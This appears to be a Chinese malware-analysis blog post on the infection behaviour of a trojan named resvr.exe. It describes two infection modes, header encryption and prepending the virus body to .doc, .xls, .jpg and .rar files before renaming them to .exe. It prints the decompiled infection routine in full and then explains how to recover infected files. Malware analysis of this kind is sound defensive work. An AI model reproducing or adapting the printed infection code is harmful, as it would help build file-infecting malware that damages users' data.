一、 序言
前面的分析一个感染型木马病毒分析(二)中,已经将该感染性木马病毒resvr.exe木马性的一面分析了一下,下面就将该感染性木马病毒resvr.exe感染性的一面分析一下。
二、文件感染方式的分析
之前感染性木马病毒的分析中,已经提到了病毒对于用户文件的感染方式有2种,分别是加密文件和感染文件传播病毒,至于文件感染的时候采取哪种感染方式,病毒母体文件和病毒母体衍生病毒文件中都有相关的标志位。
第1种感染文件的方式
前面分析的感染性木马病毒的木马性一面的过程中有下面一组远程控制命令RevCmdBuffer(如图)设置病毒进程感染文件的感染方式的标记0xAABBCCDD。
在后面病毒进程感染用户文件的时候,有对感染文件方式的判断,具体的判断依据是感染标记0xAABBCCDD(如图)。当地址0x402120处的感染标记为0xAABBCCDD时,采用第一种感染文件的方式感染(加密文件的方式)。
第1种感染文件的方式的具体方法是 不对用户系统磁盘里的文件的格式进行筛选,只要是用户系统磁盘里的文件就进行加密处理。打开用户文件,创建内存映射,以先异或后加4的方式对用户文件的头0x400个字节的数据进行加密处理。
第2种感染文件的方式
当地址0x402120处没有感染标记0xAABBCCDD时,采用第2种感染文件的方式(感染文件传播病毒)。这种感染文件的方式 会对用户系统磁盘里的文件进行筛选,仅仅对用户系统磁盘里的.doc、.xls、.jpg、.rar格式的文件进行感染处理。
病毒母体文件resvr.exe感染.doc、.xls、.jpg、.rar格式的用户文件的具体过程如下面的代码。
- int __stdcall InfectedFileOfHide_4035BD(LPCSTR lpUserFilePath, int lpUserFileEx, int nNumber)
- {
- int _hUserFile;
- signed int nUserFileSize;
- HANDLE hModuleVirusesFile;
- DWORD nVirusesModulesize;
- HGLOBAL lpMemoryAlloc;
- HGLOBAL __lpMemoryAlloc;
- __int64 nFileExFilexOffset;
- CHAR *lpUserFilePathBuffer;
- int lpUserFilePathPtr;
- DWORD NumberOfBytesWritten;
- DWORD NumberOfBytesRead;
- LPCVOID _lpMemoryAlloc;
- DWORD nVirusesAndUserFileSize;
- DWORD _nUserFileSize;
- DWORD nNumberOfBytesVirusesFileToRead;
- HANDLE hUserFile;
- HANDLE hVirusesHandle;
- CHAR szUserFilePathBuffer;
- CHAR FileVirusesName;
-
-
- _hUserFile = (int)CreateFileA(lpUserFilePath, 0xC0000000, 0, 0, 3u, 0x80u, 0);
- if (_hUserFile != -1)
- {
- hUserFile = (HANDLE)_hUserFile;
-
-
- nUserFileSize = GetFileSize((HANDLE)_hUserFile, &_nUserFileSize);
-
-
- if (nUserFileSize > 0x8000000 || _nUserFileSize)
- {
- _hUserFile = CloseHandle(hUserFile);
- }
- else
- {
- _nUserFileSize = nUserFileSize;
-
-
- GetModuleFileNameA(0, &FileVirusesName, 0x104u);
-
-
- hModuleVirusesFile = CreateFileA(&FileVirusesName, 0x80000000, 3u, 0, 3u, 0x80u, 0);
- hVirusesHandle = hModuleVirusesFile;
-
-
- nVirusesModulesize = GetFileSize(hModuleVirusesFile, &nNumberOfBytesVirusesFileToRead);
- nNumberOfBytesVirusesFileToRead = nVirusesModulesize;
-
-
- nVirusesAndUserFileSize = _nUserFileSize + nVirusesModulesize;
-
-
- lpMemoryAlloc = GlobalAlloc(0x40u, _nUserFileSize + nVirusesModulesize);
- if (lpMemoryAlloc)
- {
- _lpMemoryAlloc = lpMemoryAlloc;
- __lpMemoryAlloc = lpMemoryAlloc;
-
-
- ReadFile(hVirusesHandle, lpMemoryAlloc, nNumberOfBytesVirusesFileToRead, &NumberOfBytesRead, 0);
-
-
- ReadFile(hUserFile, (char *)__lpMemoryAlloc + nNumberOfBytesVirusesFileToRead,_nUserFileSize, &NumberOfBytesRead,
- 0);
-
-
- setFileInfor_403B61((int)&_nUserFileSize, (int)_lpMemoryAlloc, dword_402000, (int)&_nUserFileSize, 4);
-
-
- LODWORD(nFileExFilexOffset) = setFileInfor_403B61(
- (int)&lpUserFileEx,
- (int)_lpMemoryAlloc,
- dword_402008,
- (int)&lpUserFileEx,
- 4);
-
-
-
- SetUserFileIcon_403573(nFileExFilexOffset, (int)_lpMemoryAlloc, nNumber);
-
-
- SetFilePointer(hUserFile, 0, 0, 0);
-
-
-
- WriteFile(hUserFile, _lpMemoryAlloc, nVirusesAndUserFileSize, &NumberOfBytesWritten, 0);
-
-
- GlobalFree((HGLOBAL)_lpMemoryAlloc);
-
-
- CloseHandle(hVirusesHandle);
- CloseHandle(hUserFile);
-
-
- RtlMoveMemory(&szUserFilePathBuffer, lpUserFilePath, 0x104);
- lpUserFilePathBuffer = &szUserFilePathBuffer;
-
-
- while (*lpUserFilePathBuffer++ != 0)
- ;
- *lpUserFilePathBuffer = 0;
-
-
- lpUserFilePathPtr = (int)(lpUserFilePathBuffer - 5);
-
-
- *(_DWORD *)lpUserFilePathPtr = 'exe.';
-
-
- _hUserFile = MoveFileA(lpUserFilePath, &szUserFilePathBuffer);
-
-
- if (!_hUserFile)
- {
- _hUserFile = GetLastError();
-
- if (_hUserFile == 0xB7)
- {
-
- *(_DWORD *)lpUserFilePathPtr = lpUserFileEx;
-
-
- *(_DWORD *)(lpUserFilePathPtr + 4) = 'exe.';
- *(_DWORD *)(lpUserFilePathPtr + 8) = 0;
-
-
- _hUserFile = MoveFileA(lpUserFilePath, &szUserFilePathBuffer);
- }
- }
- }
- else
- {
-
- CloseHandle(hVirusesHandle);
- _hUserFile = CloseHandle(hUserFile);
- }
- }
- }
- return _hUserFile;
- }
病毒母体文件resvr.exe感染.doc、.xls、.jpg、.rar格式的用户文件的具体流程如下。
三、被感染文件的修复
第1种感染方式文件的修复
对于被第1种感染方式处理的用户文件的修复比较简单,只需遍历被加密的用户文件,以内存映射的方式打开文件,对打开文件的头0x400个字节的数据的进行先减4(字节类型)后异或0x5FF80F64(DWORD型)的处理即可修复被感染加密处理的用户文件。修复被感染文件的难点是如何判断用户的文件是被这种感染方式处理的。
第2种感染方式文件的修复
这个感染方式对用户.doc、.xls、.jpg、.rar格式的文件的感染,其实就是病毒母体resvr.exe产生衍生病毒即产生病毒载体的过程。只要将上面提到的病毒感染用户文件的过程理解清楚了,恢复文件也不能。
病毒母体文件resvr.exe与衍生病毒载体的文件对比。
将病毒母体文件“resvr.exe”与衍生病毒文件“石林.xls.exe”进行16进制的对比,发现两处不同。
文件对比结果的第1处不同是恢复感染用户文件的关键,具体的说明如图。
当为病毒母体文件resvr.exe时,标记 1--0x11111111后面的值是0xFFFFFFFF,标记 2--0x22222222后面保存的默认文件后缀名为.xls。
当为衍生病毒文件时,标记 1--0x11111111后面的值是被感染用户文件原文件的大小,标记 2--0x22222222后面保存的被感染用户文件原文件的后缀名。
文件对比结果的第2处不同,对于恢复被感染的用户文件也是有帮助的。
病毒母体文件resvr.exe的大小为0x11200,在衍生病毒文件中从文件偏移FileOffset=0x11200到文件结尾的数据就是被用户感染.doc、.xls、.jpg、.rar格式的文件原文件的数据。
恢复方法总结
一、.获取被感染用户文件的原文件的大小
方法1、通过在衍生病毒文件中搜索0x11111111的位置即可获取原文件的大小,因为被感染用户文件原文件的字节大小信息保存在该位置+4的地方;
方法2、直接定位衍生病毒文件的偏移0x400的位置找到0x1111111,该位置+4的地方就是被感染用户文件原文件的字节大小的信息。
二、获取被感染用户文件的原文件的文件类型
方法1、通过在衍生病毒文件中搜索0x22222222的位置即可获取被感染用户文件原文件类型字符串,因为被感染用户文件原文件类型字符串信息保存在该位置+4的地方;
方法2、直接定位衍生病毒文件的偏移0x408的位置找到0x22222222,该位置+4的地方就是被感染用户文件原文件类型字符串信息。
三、获取被隐藏的原文件的文件的数据
由于衍生病毒隐藏用户文件的方式很简单,直接将用户文件(要被感染的用户文件原文件)紧接着放在病毒母体文件数据的后面,并将用户文件(要被感染的用户文件原文件)信息保存在病毒母体的文件数据中,并且病毒母体文件的大小为0x11200。
病毒母体文件数据(保存了被感染用户文件的信息)0x11200 | 被感染用户文件的原文件数据 |
因此,只要读取衍生病毒文件中病毒母体文件数据后面即文件偏移0x11200以后至文件末尾的数据,再重新创建一个文件被感染用户文件的原文件就可恢复了。
感染性木马病毒详细的分析完了,笔记也完成了,过程还是快乐的,加油!